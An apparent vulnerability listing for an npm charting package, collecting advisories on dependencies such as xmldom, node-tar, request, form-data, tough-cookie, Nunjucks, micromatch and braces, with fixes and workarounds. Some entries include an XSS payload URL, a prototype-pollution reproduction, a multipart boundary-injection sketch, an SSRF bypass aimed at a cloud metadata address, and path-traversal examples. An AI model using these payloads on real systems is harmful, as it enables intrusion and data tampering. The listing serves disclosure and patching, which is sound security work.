All vulnerabilities related to version 2.0.0 of the package
Uncontrolled Resource Consumption in trim-newlines
@rkesters/gnuplot is an easy-to-use Node.js module for drawing charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js is vulnerable to regular expression denial of service (ReDoS) in the .end() method.
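As context, here is a minimal regex-free sketch of trimming trailing newlines in linear time; it assumes only \r and \n need to be handled and is not the package's actual source, but a linear scan like this cannot exhibit the catastrophic backtracking that the vulnerable regular expression could.

// minimal sketch (not trim-newlines' actual code): strip trailing '\r' and '\n'
// by scanning from the end, which runs in linear time and cannot backtrack
function trimNewlinesEnd(str) {
  let end = str.length
  while (end > 0 && (str[end - 1] === '\n' || str[end - 1] === '\r')) {
    end--
  }
  return end === str.length ? str : str.slice(0, end)
}

console.log(JSON.stringify(trimNewlinesEnd('unicorn\r\n\r\n'))) // "unicorn"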
Misinterpretation of malicious XML input
xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.
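The sketch below only illustrates the parse, detach and serialize flow the advisory describes, using the DOMParser and XMLSerializer exports of @xmldom/xmldom; it is not a working exploit, and the sample document is an arbitrary assumption:

const { DOMParser, XMLSerializer } = require('@xmldom/xmldom')

// parse a document, detach an element from its ancestor, then serialize the
// detached element; in xmldom <= 0.6.0 special characters in this situation
// could end up insufficiently escaped in the serialized output
const doc = new DOMParser().parseFromString(
  '<root><child attr="a &amp; b">text &lt;tag&gt;</child></root>',
  'text/xml'
)
const child = doc.documentElement.firstChild
doc.documentElement.removeChild(child)
console.log(new XMLSerializer().serializeToString(child))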
Update to one of the fixed versions of @xmldom/xmldom (>=0.7.0)
See issue #271 for the status of publishing xmldom to npm or join #270 for Q&A/discussion until it's resolved.
Downstream applications can validate the input and reject the maliciously crafted documents.
This is similar to an issue reported on the Go standard library.
xmldom allows multiple root nodes in a DOM
xmldom parses XML that is not well-formed because it contains multiple top level elements, and adds all root nodes to the childNodes collection of the Document, without reporting any error or throwing.
This breaks the assumption that there is only a single root node in the tree, which led to https://nvd.nist.gov/vuln/detail/CVE-2022-39299 and is a potential issue for dependents.
Update to @xmldom/xmldom@~0.7.7, @xmldom/xmldom@~0.8.4 (dist-tag latest) or @xmldom/xmldom@>=0.9.0-beta.4 (dist-tag next).
One of the following approaches might help, depending on your use case:
- Instead of searching for elements in the whole DOM, only search in the documentElement.
- Reject documents whose Document node has more than one element childNode (see the sketch below).
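A minimal sketch of that check, assuming the document is parsed with @xmldom/xmldom (the nodeType test and the error message are illustrative choices, not API guidance):

const { DOMParser } = require('@xmldom/xmldom')

function parseSingleRoot(xml) {
  const doc = new DOMParser().parseFromString(xml, 'text/xml')
  // count the element children of the Document node; a well-formed document
  // has exactly one (nodeType 1 === ELEMENT_NODE)
  let rootElements = 0
  for (let i = 0; i < doc.childNodes.length; i++) {
    if (doc.childNodes.item(i).nodeType === 1) {
      rootElements++
    }
  }
  if (rootElements !== 1) {
    throw new Error('rejecting document: expected exactly one root element')
  }
  return doc
}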
Misinterpretation of malicious XML input
xmldom versions 0.4.0 and older do not correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents.
This may lead to unexpected syntactic changes during XML processing in some downstream applications.
Update to 0.5.0 (once it is released)
Downstream applications can validate the input and reject the maliciously crafted documents.
This is similar to an issue reported on the Go standard library.
Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the preservePaths flag is not set to true. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example /home/user/.bashrc would turn into home/user/.bashrc.
This logic was insufficient when file paths contained repeated path roots such as ////home/user/.bashrc. node-tar would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. ///home/user/.bashrc) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite.
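A small illustration of the failure mode described above (this is not node-tar's actual stripping code, just the effect of removing only one path root):

const path = require('path')

// stripping only one leading '/' from a repeated-root entry path...
const entryPath = '////home/user/.bashrc'
const stripped = entryPath.replace(/^\//, '')         // '///home/user/.bashrc'

// ...still leaves an absolute path, so resolving it against the extraction
// directory escapes that directory entirely
console.log(path.isAbsolute(stripped))                // true
console.log(path.resolve('/extract/dir', stripped))   // '/home/user/.bashrc' on POSIX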
Patched in versions 3.2.2 || 4.4.14 || 5.0.6 || 6.1.1
NOTE: an adjacent issue CVE-2021-32803 affects this release level. Please ensure you update to the latest patch levels that address CVE-2021-32803 as well if this adjacent issue affects your node-tar use case.
Users may work around this vulnerability without upgrading by creating a custom onentry method which sanitizes the entry.path or a filter method which removes entries with absolute paths.
const path = require('path')
const tar = require('tar')

tar.x({
  file: 'archive.tgz',
  // either add this function...
  onentry: (entry) => {
    if (path.isAbsolute(entry.path)) {
      entry.path = sanitizeAbsolutePathSomehow(entry.path)
      entry.absolute = path.resolve(entry.path)
    }
  },
  // or this one
  filter: (file, entry) => {
    if (path.isAbsolute(entry.path)) {
      return false
    } else {
      return true
    }
  }
})
Users are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain .. path portions, and resolving the sanitized paths against the extraction target directory.
This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as C:some\path. If the drive letter does not match the extraction target, for example D:\extraction\dir, then the result of path.resolve(extractionDirectory, entryPath) would resolve against the current working directory on the C: drive, rather than the extraction target directory.
Additionally, a .. portion of the path could occur immediately after the drive letter, such as C:../foo, and was not properly sanitized by the logic that checked for .. within the normalized and split portions of the path.
This only affects users of node-tar on Windows systems.
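The behavior can be illustrated with Node's win32 path implementation; the extraction directory and entry paths below are made-up examples:

const path = require('path').win32

// 'C:some\path' is drive-relative: not absolute, but not safely relative either
console.log(path.isAbsolute('C:some\\path'))             // false

// resolving it against the extraction target lands on the C: drive (relative to
// that drive's current directory), not under D:\extract\dir
console.log(path.resolve('D:\\extract\\dir', 'C:some\\path'))

// a '..' hidden behind the drive letter also evades a naive check for '..' segments
console.log(path.normalize('C:../foo').split('\\'))      // [ 'C:..', 'foo' ]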
Patched in versions 4.4.18 || 5.0.10 || 6.1.9
There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does.
Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.
The fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not "absolute".
Additionally, a path starting with a drive letter and then two dots, like c:../, would bypass the check for .. path portions. This is checked properly in the patched versions.
Finally, a defense-in-depth check is added, such that if entry.absolute is outside of the extraction target and we are not in preservePaths:true mode, a warning is raised on that entry and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development.
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar package I came across the folder creation process. Basically, if you provide node-tar with a path like ./a/b/c/foo.txt, it creates every folder and sub-folder here (a, b and c) until it reaches the last folder and creates foo.txt. I noticed that there is no validation at all on the number of folders being created, which means an attacker can exhaust the CPU and memory of the system running node-tar, and even crash the Node.js client within a few seconds of running it, by using a path with too many sub-folders inside.
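For a sense of scale, an entry path of the problematic shape can be generated like this (the depth and directory names are arbitrary assumptions):

// build a path with a very large number of nested single-character directories;
// extracting an archive containing such an entry makes affected versions create
// one directory per component
const depth = 100000
const maliciousEntryPath = new Array(depth).fill('d').join('/') + '/foo.txt'
console.log(maliciousEntryPath.length) // roughly 200 KB of path, 100000 mkdir calls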
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it; you should get the same behavior as in the video.
Here's a video showcasing the exploit:
Denial of service by crashing the Node.js client when attempting to parse a tar archive, making it run out of heap memory and consuming server CPU and memory resources.
This issue was originally reported to the GitHub bug bounty program; they asked me to report it to you a month ago.
Server-Side Request Forgery in Request
The request package through 2.88.2 for Node.js and the @cypress/request package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controlled server that performs a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: The request package is no longer supported by the maintainer.
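A hedged sketch of the bypass pattern follows; the allowlist check, the attacker-controlled URL and the internal target are hypothetical, and only the redirect-following behavior belongs to request itself:

const request = require('request') // affected: request <= 2.88.2

// hypothetical SSRF mitigation that only inspects the initial URL
function isAllowedUrl(url) {
  return new URL(url).protocol === 'https:' && !url.includes('169.254.169.254')
}

const target = 'https://attacker.example/redirect' // attacker-controlled, passes the check

if (isAllowedUrl(target)) {
  // the attacker's server responds with a redirect to http://169.254.169.254/...;
  // request follows the cross-protocol redirect, so the mitigation is bypassed
  request({ url: target, followRedirect: true }, (err, res, body) => {
    if (!err) console.log(res.statusCode)
  })
}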
form-data uses unsafe random function in form-data for choosing boundary
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
- can observe other values produced by Math.random() in the target application, and
- can control one field of a request made using form-data.
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains the boundary value, allowing them to inject additional parameters into the request.
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347
An attacker who is able to predict the output of Math.random() can predict this boundary value and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application in order to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to recover the Math.random() outputs). A common example would be an x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, OpenTelemetry uses Math.random() for this purpose).
PoC here: https://github.com/benweissmann/CVE-2025-7783-poc
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
For an application to be vulnerable, it must:
- Use form-data to send data, including user-controlled data, to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array).
- Expose the output of Math.random() to the attacker in some way (for example, via a randomly generated request ID included in responses), so that the state of the PRNG can be recovered.

If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
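A sketch of the injection step, assuming the attacker has already recovered the PRNG state and predicted the boundary (the field name and the predicted value are hypothetical):

// if the boundary is predictable, a user-supplied field value can close its own
// part and smuggle in an extra, attacker-chosen field
const predictedBoundary = '--------------------------0123456789abcdefabcdef01' // hypothetical
const maliciousValue =
  'harmless text\r\n' +
  '--' + predictedBoundary + '\r\n' +
  'Content-Disposition: form-data; name="is_admin"\r\n' +
  '\r\n' +
  'true'
// when form-data serializes a part containing maliciousValue under that exact
// boundary, the receiving multipart parser sees an additional "is_admin" field
console.log(maliciousValue)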
tough-cookie Prototype Pollution vulnerability
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
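A minimal reproduction sketch along the lines of publicly documented reproductions (the cookie name and paths are illustrative):

const tough = require('tough-cookie') // affected: < 4.1.3

const jar = new tough.CookieJar(undefined, { rejectPublicSuffixes: false })
jar.setCookieSync('Slonser=polluted; Domain=__proto__; Path=/notauth', 'https://__proto__/admin')

// in affected versions the cookie ends up stored on Object.prototype,
// so an unrelated empty object now has a '/notauth' property
const unrelated = {}
console.log(unrelated['/notauth']) // not undefined in affected versions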
Nunjucks autoescape bypass leads to cross site scripting
In Nunjucks versions prior to 3.2.4, it was possible to bypass the restrictions provided by the autoescape functionality. If two user-controlled parameters are used on the same line in a view, it is possible to inject cross-site scripting payloads using the backslash \ character.
If the user-controlled parameters are used in a view like the following:
<script>
  let testObject = { lang: '{{ lang }}', place: '{{ place }}' };
</script>
It is possible to inject an XSS payload using the following parameters:
https://<application-url>/?lang=jp\&place=};alert(document.domain)//
The issue was patched in version 3.2.4.
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* greedily matches anything. When passed a malicious payload, the pattern matching keeps backtracking over the input while it fails to find the closing bracket. As the input size increases, the processing time also increases until the application hangs or slows down. An earlier fix was merged, but further testing showed the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. The issue can be mitigated by using a safe pattern that does not trigger backtracking due to greedy matching.
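Until an upgrade to 4.0.8 or later is possible, one assumed defensive pattern is to cap the length of untrusted patterns before they reach the matcher; the wrapper and limit below are illustrative, not part of micromatch's API:

const micromatch = require('micromatch')

const MAX_PATTERN_LENGTH = 1024 // arbitrary cap for untrusted input

function safeIsMatch(str, pattern) {
  if (typeof pattern !== 'string' || pattern.length > MAX_PATTERN_LENGTH) {
    throw new Error('pattern rejected: not a string or too long')
  }
  return micromatch.isMatch(str, pattern)
}

console.log(safeIsMatch('foo.js', '*.js')) // true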
Regular Expression Denial of Service in braces
Versions of braces prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.
Upgrade to version 2.3.1 or higher.
Uncontrolled resource consumption in braces
The NPM package braces fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.
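A similar input-length guard helps here as well; the sketch below shows the shape of the problematic input and an assumed cap in front of braces (the threshold is arbitrary):

const braces = require('braces')

// the problematic input shape: a large number of unmatched '{' characters
const imbalanced = '{'.repeat(1000000)

// guard untrusted patterns before handing them to braces
const MAX_PATTERN_LENGTH = 1024
function safeExpand(pattern) {
  if (pattern.length > MAX_PATTERN_LENGTH) {
    throw new Error('pattern rejected: too long')
  }
  return braces(pattern, { expand: true })
}

console.log(safeExpand('a/{b,c}/d')) // [ 'a/b/d', 'a/c/d' ]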